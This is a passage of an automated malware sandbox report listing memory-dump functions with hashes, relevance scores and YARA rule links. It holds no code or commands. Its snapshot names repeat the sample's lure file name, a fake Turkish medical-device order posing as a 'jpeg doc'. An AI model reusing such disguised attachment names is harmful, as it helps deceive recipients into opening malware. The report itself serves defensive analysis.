                                                                                                  • Opcode Fuzzy Hash: b716708f9093b9dee82a4dde3a6500614ef5e1dbf60d79af0af9621b3ad267ba
                                                                                                  • Instruction Fuzzy Hash: 4221A1357006118BCB159B29D464A2EB7AAEF89755B098469E926CB394CF35DC03CBD0
                                                                                                  Function 028AD044 Relevance: .1, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3758615357.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_28ad000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 21f7941da71f16d4f43565d638908e2ee79052f3194f3ef2014e5b3ae22c9bb1
                                                                                                  • Instruction ID: 74e39aec7489e172dabbc3667947446fee1a3eb506df11395252db7e836a5dc2
                                                                                                  • Opcode Fuzzy Hash: 21f7941da71f16d4f43565d638908e2ee79052f3194f3ef2014e5b3ae22c9bb1
                                                                                                  • Instruction Fuzzy Hash: 2421257D504204AFEB14CF20C9D5B16BBA1FB88318F20C56DE849CF642CB3AD447CA62
                                                                                                  Function 029AAEF0 Relevance: .1, Instructions: 71COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 21fdc86702b205f264b6e0d22476e6725db39a8fb1f7d36fcdd88203e0c201b0
                                                                                                  • Instruction ID: e017ef84b4e4d9d87df89cf7cd43eebcdcd21578eb1aed70a32078231a4021ee
                                                                                                  • Opcode Fuzzy Hash: 21fdc86702b205f264b6e0d22476e6725db39a8fb1f7d36fcdd88203e0c201b0
                                                                                                  • Instruction Fuzzy Hash: 2921A476B102049FCB148F54DC96BADBFB5FB8C310F145026F905A7390DA719C02CB90
                                                                                                  Function 029A4285 Relevance: .1, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 30952f7c85b9351bc2cccff4109f4d87ba2ac421b516ef5416adef96c319e49d
                                                                                                  • Instruction ID: df04c40f1ae03bcb09f8c8d770fd8a1d0dfffbca13a448e013dd7e6f9c1f6047
                                                                                                  • Opcode Fuzzy Hash: 30952f7c85b9351bc2cccff4109f4d87ba2ac421b516ef5416adef96c319e49d
                                                                                                  • Instruction Fuzzy Hash: 1A318078E01308DFCB44EFA8E59499DBBB6FF49304B205469E819AB364DB35AD06CF40
                                                                                                  Function 029A5649 Relevance: .1, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bb2891cae2893f4231e42f9ddac266f161b74734f763646ec0eb20363b69aba4
                                                                                                  • Instruction ID: ee6e90b5ec3e80c77fada9b221fda9f1418d358fcb8e491963e6681207900b10
                                                                                                  • Opcode Fuzzy Hash: bb2891cae2893f4231e42f9ddac266f161b74734f763646ec0eb20363b69aba4
                                                                                                  • Instruction Fuzzy Hash: E321C075B016098FDB01AF68E454B6E3BA6EB48314F458464F905DB358CB34DA52CBE1
                                                                                                  Function 029A9761 Relevance: .1, Instructions: 65COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 09b164a11a3348146ad5a78abc9b1919ed138ad8100db3c502f2d3cdf1626896
                                                                                                  • Instruction ID: 5d998053f1f089bdc32b974ba89e053ae59fd2e5b471a4c9068213450971b2d7
                                                                                                  • Opcode Fuzzy Hash: 09b164a11a3348146ad5a78abc9b1919ed138ad8100db3c502f2d3cdf1626896
                                                                                                  • Instruction Fuzzy Hash: DA217C35E012489FEB05CFA5D5A0AEEBFBAFF49305F248469E415E6290DB34D942CF60
                                                                                                  Function 029A62F0 Relevance: .1, Instructions: 62COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f71d67206fc9e8a56cc6084232a17110ca79eb0f23fea3e2f38169772c7f1154
                                                                                                  • Instruction ID: e0ab657ffe202633581bed1bb1ef9d9070d9dfc06a92fee71800fa81b4920bb9
                                                                                                  • Opcode Fuzzy Hash: f71d67206fc9e8a56cc6084232a17110ca79eb0f23fea3e2f38169772c7f1154
                                                                                                  • Instruction Fuzzy Hash: 6211C1357046118FCB158B29D46892E7BAAEF8A35570D44A9E516CB3A4DF25DC03C790
                                                                                                  Function 029AF658 Relevance: .1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 25812d27fbc7c0bc566594fa3cb2f1cfcc79dc6d73b0ae954aaa1ff00139a54d
                                                                                                  • Instruction ID: ecd4f81049548cc5f37cf6f1af42354ec197c3e0f3c403822cfe5838a1665312
                                                                                                  • Opcode Fuzzy Hash: 25812d27fbc7c0bc566594fa3cb2f1cfcc79dc6d73b0ae954aaa1ff00139a54d
                                                                                                  • Instruction Fuzzy Hash: F8216D78D003499FEF05EFA8D54068EBBF2FF41314F1486AAC0549F2A5EB745A068F82
                                                                                                  Function 029AF668 Relevance: .1, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 624524074662480b70a509f8bc85022c42561dd1662642f8c176abf6dae846f8
                                                                                                  • Instruction ID: 574af17ec71c9f178d87868430f20ce71ced8ee62ffd1bd264bdd65cf9dd633c
                                                                                                  • Opcode Fuzzy Hash: 624524074662480b70a509f8bc85022c42561dd1662642f8c176abf6dae846f8
                                                                                                  • Instruction Fuzzy Hash: CB110778E0020D9FEB44EFB9D58079EBBF2FB45304F1485A9C1189B295EB705A069F91
                                                                                                  Function 029A27F0 Relevance: .1, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2cedc298628b89ea20cf74b3928400fd5fead4422687f87beb485df0205abe92
                                                                                                  • Instruction ID: f258f344e9816fb946828355355e099b6c3c4f68988a3440ff34c94cd02703e4
                                                                                                  • Opcode Fuzzy Hash: 2cedc298628b89ea20cf74b3928400fd5fead4422687f87beb485df0205abe92
                                                                                                  • Instruction Fuzzy Hash: 8321CF74C002098FCF40EFA9D9456EEBBF4FB19300F10552AE805B3214EB345A95CBA1
                                                                                                  Function 028AD03F Relevance: .1, Instructions: 53COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3758615357.00000000028AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 028AD000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_28ad000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                  • Instruction ID: efdd0693346dbf957d4e0ff61e136c0a7f47ae37b915d500d2d124df1fd304a5
                                                                                                  • Opcode Fuzzy Hash: e020fc52024e7c20771691695641137c464337d5c785334117d46b726f4046fe
                                                                                                  • Instruction Fuzzy Hash: 2011BE79504244CFDB11CF10D5D4B15FBA2FB48314F24C6ADE8498BA52C73AD44ACF51
                                                                                                  Function 029A5EA8 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: eab1d570829332c50b38c2fb558f2cf8aec90d9ffd3d9f859097162e4708c754
                                                                                                  • Instruction ID: bf217dad007e60249d02cf91b6851272ac68a1f416606af47499f0a33bbcfbb3
                                                                                                  • Opcode Fuzzy Hash: eab1d570829332c50b38c2fb558f2cf8aec90d9ffd3d9f859097162e4708c754
                                                                                                  • Instruction Fuzzy Hash: C401D632B002187BCB159E999810AAF3FEBDBC8750F598029F905D7284CE758D118BD0
                                                                                                  Function 029AABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7fbc7438d83aefd336acdcd6c03a80f4d68a13ad65545d26ed0b8be7bbfafa68
                                                                                                  • Instruction ID: bbbb9595164c2e06ed6d16b71f9486d06696ed42ef467827eefb669fbe584cbe
                                                                                                  • Opcode Fuzzy Hash: 7fbc7438d83aefd336acdcd6c03a80f4d68a13ad65545d26ed0b8be7bbfafa68
                                                                                                  • Instruction Fuzzy Hash: A0F062317007104B97256A2E9465A2EB6BEEFC8A55316406AE905C7361EF21CC03C7D0
                                                                                                  Function 029A5E98 Relevance: .0, Instructions: 43COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 09d2791aef2cfcb7e7996e09c8ff5e6a4072091f989435b43d052f1ec0cbfccf
                                                                                                  • Instruction ID: 2dba0c083c7c7a6122900703b6e8ce98f8b9c67b447007150eb87e45d04f809a
                                                                                                  • Opcode Fuzzy Hash: 09d2791aef2cfcb7e7996e09c8ff5e6a4072091f989435b43d052f1ec0cbfccf
                                                                                                  • Instruction Fuzzy Hash: BE01A472A002187FDB128F95AC60BEF3FAAEB88750F188029F504C6240DA758913DB94
                                                                                                  Function 029AE8E8 Relevance: .0, Instructions: 42COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 87e6b0d1d56342b4233f14b609d314e3c63bac1395b796315175bd854fb1c7bf
                                                                                                  • Instruction ID: 2baeb9273f81f318e7e2c1e496aeb75294df9456f00f38c35dbd119bab7e33f4
                                                                                                  • Opcode Fuzzy Hash: 87e6b0d1d56342b4233f14b609d314e3c63bac1395b796315175bd854fb1c7bf
                                                                                                  • Instruction Fuzzy Hash: CC015E78D00209EFDF41DFA4E484AAEFBB1FB49304F504465D914A3354D7746A56CF90
                                                                                                  Function 0289D007 Relevance: .0, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3758542705.000000000289D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0289D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_289d000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d6fed436fd4a679d95122f0b899e1c4be9307421e5774a520ee12704cc2dd4a4
                                                                                                  • Instruction ID: ae5ef8aab33eb9dc34017e03a9a433b27471bb76271a6e1668f7532939579065
                                                                                                  • Opcode Fuzzy Hash: d6fed436fd4a679d95122f0b899e1c4be9307421e5774a520ee12704cc2dd4a4
                                                                                                  • Instruction Fuzzy Hash: E301F4755097C0AFC712CF15C854C22BFB9EF8666071D85CAE8858F263C635EC06CB61
                                                                                                  Function 0289D01F Relevance: .0, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3758542705.000000000289D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0289D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_289d000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bde4a4e88ad4eec4f55ae847428c995c3f14163e5fb694051f9bb5f746b8b127
                                                                                                  • Instruction ID: 8eec6399c84c66c966e713903f42f1fae9188ce413008364fbc3f401ec8b255b
                                                                                                  • Opcode Fuzzy Hash: bde4a4e88ad4eec4f55ae847428c995c3f14163e5fb694051f9bb5f746b8b127
                                                                                                  • Instruction Fuzzy Hash: 52F04F76600604AF8720CF06C884C27FBADEBC4670319C55AF84A4B612C271EC02CEA0
                                                                                                  Function 029A28A3 Relevance: .0, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3db8ee976e1cf8b9d133b2ac8fbe5bf903b2da743e91d51855aefbd0082d7ed1
                                                                                                  • Instruction ID: 04a552b7efaa7975d3bb3055140c1052a5dfae3d0e80e8d7b53ab68ffcbe149c
                                                                                                  • Opcode Fuzzy Hash: 3db8ee976e1cf8b9d133b2ac8fbe5bf903b2da743e91d51855aefbd0082d7ed1
                                                                                                  • Instruction Fuzzy Hash: 54E08632D1026957CB11E7A5DC016DEBF38EF86324F944665D41133580EB30A569C2A0
                                                                                                  Function 029A28B0 Relevance: .0, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9f8365a2e771cc66e296e55e15752b38936d23825db561e8627ca873e0de347c
                                                                                                  • Instruction ID: 01bee33d49dbe891f419d92e91c8902dac4829102c03bb42200e91b9da9e6017
                                                                                                  • Opcode Fuzzy Hash: 9f8365a2e771cc66e296e55e15752b38936d23825db561e8627ca873e0de347c
                                                                                                  • Instruction Fuzzy Hash: 46D05B31D2033A57CB10E7A5DC044DFFB38EED5321B514666D51437144FB706659C6E1
                                                                                                  Function 029AD6D4 Relevance: .0, Instructions: 16COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3ff08225b369b0404a7927ab95a3f1cbaeda9687f991f3a28e91ab225e5c7250
                                                                                                  • Instruction ID: 9d3a79a688f81178a8d85264c4597fd6f85791e90fa6e6c086e952ec003a6979
                                                                                                  • Opcode Fuzzy Hash: 3ff08225b369b0404a7927ab95a3f1cbaeda9687f991f3a28e91ab225e5c7250
                                                                                                  • Instruction Fuzzy Hash: BFD04235E14209CBCB20EFA8E4954DCBBB1EB49321F10642AE925A3652DA345456CF51
                                                                                                  Function 029A6739 Relevance: .0, Instructions: 16COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3d62fbdc1a8b2e0fe4734229de2c9e0c2b537ef8a0ea255ecb6f24f6e2ee56f3
                                                                                                  • Instruction ID: df8495d7087126fd16473d7d40b757d5096c7b995366a512b52424da2abdf105
                                                                                                  • Opcode Fuzzy Hash: 3d62fbdc1a8b2e0fe4734229de2c9e0c2b537ef8a0ea255ecb6f24f6e2ee56f3
                                                                                                  • Instruction Fuzzy Hash: 54D05E355143A51BD702E375A8466AD3FAAD7C1520F449550F0850D52EEF6814038B72
                                                                                                  Function 029AAFAD Relevance: .0, Instructions: 16COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e705cd296b51ced9bd5bc116a25aa711b100c05374fb4f470a59053128c40c2f
                                                                                                  • Instruction ID: 37c121f58aaa65f8847e4f1ac5d9752d135a525245b98a247ff1f869bfdfbeed
                                                                                                  • Opcode Fuzzy Hash: e705cd296b51ced9bd5bc116a25aa711b100c05374fb4f470a59053128c40c2f
                                                                                                  • Instruction Fuzzy Hash: 5BD0673AB101089FDB149F98E8419DDF776FB98221B548117F915A3260C6319926DB90
                                                                                                  Function 029A6748 Relevance: .0, Instructions: 12COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f656a56de611420e6e59f1e672d3fd02fb5c2e4f193116a0bdbcb19ca9dfcd26
                                                                                                  • Instruction ID: 96a6746a62fe4b92f5ed4d440ef6a36fa3e1b226a3378ba9f74e1ef99aeac51f
                                                                                                  • Opcode Fuzzy Hash: f656a56de611420e6e59f1e672d3fd02fb5c2e4f193116a0bdbcb19ca9dfcd26
                                                                                                  • Instruction Fuzzy Hash: FEC012385003145BD541F775EC4555A33AED6C0924B409910B0050D16D9F7419474BB2

                                                                                                  Non-executed Functions

                                                                                                  Function 029A29E0 Relevance: 5.5, Strings: 4, Instructions: 474COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xq$Xq$Xq$Xq
                                                                                                  • API String ID: 0-3965792415
                                                                                                  • Opcode ID: 6fa2ea39809ec1c6cdf4665c2cdd4c45eedbe2dbab00b28229694d709acbe286
                                                                                                  • Instruction ID: fa632fa0d493e5806f7c35333bcf220ea3a0223186f64c8913f4fcb39d029df5
                                                                                                  • Opcode Fuzzy Hash: 6fa2ea39809ec1c6cdf4665c2cdd4c45eedbe2dbab00b28229694d709acbe286
                                                                                                  • Instruction Fuzzy Hash: 49120B348052D2CFD7129BB8986779FFFB4AFCA200B0D44DAC8915B257CE29658AC7D1
                                                                                                  Function 029A2A69 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Xq$Xq$Xq$Xq
                                                                                                  • API String ID: 0-3965792415
                                                                                                  • Opcode ID: f00bf70aa061c57cdfe0de9dfb4c8399b915158e21cad5b6af74cec4230e855f
                                                                                                  • Instruction ID: 642995582380d309b475019c59f9e46afaea4dd7b9459be56312dca40a3d5389
                                                                                                  • Opcode Fuzzy Hash: f00bf70aa061c57cdfe0de9dfb4c8399b915158e21cad5b6af74cec4230e855f
                                                                                                  • Instruction Fuzzy Hash: 42318671D013194BEF74DF6988A53AFB6BAAB89310F144479C80AA7381DB70C945CBD2
                                                                                                  Function 029A6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.3759058822.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_29a0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: \;q$\;q$\;q$\;q
                                                                                                  • API String ID: 0-2933265366
                                                                                                  • Opcode ID: dd1051429379bbeae4dc1a98b01814d00e723a0e0458b768a52b9fe43b3f205e
                                                                                                  • Instruction ID: e15ad257e2dd92de3f3153541ab26c244dd6cfbbcf9562e74b5550cefb2c33cf
                                                                                                  • Opcode Fuzzy Hash: dd1051429379bbeae4dc1a98b01814d00e723a0e0458b768a52b9fe43b3f205e
                                                                                                  • Instruction Fuzzy Hash: 110116367002158FCB288A29C564A6677EEBBC9A6472D466AE406CF374DE21EC428791